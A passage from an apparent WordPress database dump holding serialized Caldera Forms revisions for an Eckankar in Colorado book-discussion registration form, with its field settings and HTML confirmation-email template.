data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 16px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(32,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 18:11:12 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:16:\"<p>{summary}</p>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8864:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us. We will only use your information to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(33,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 18:22:29 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:16:\"<p>{summary}</p>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 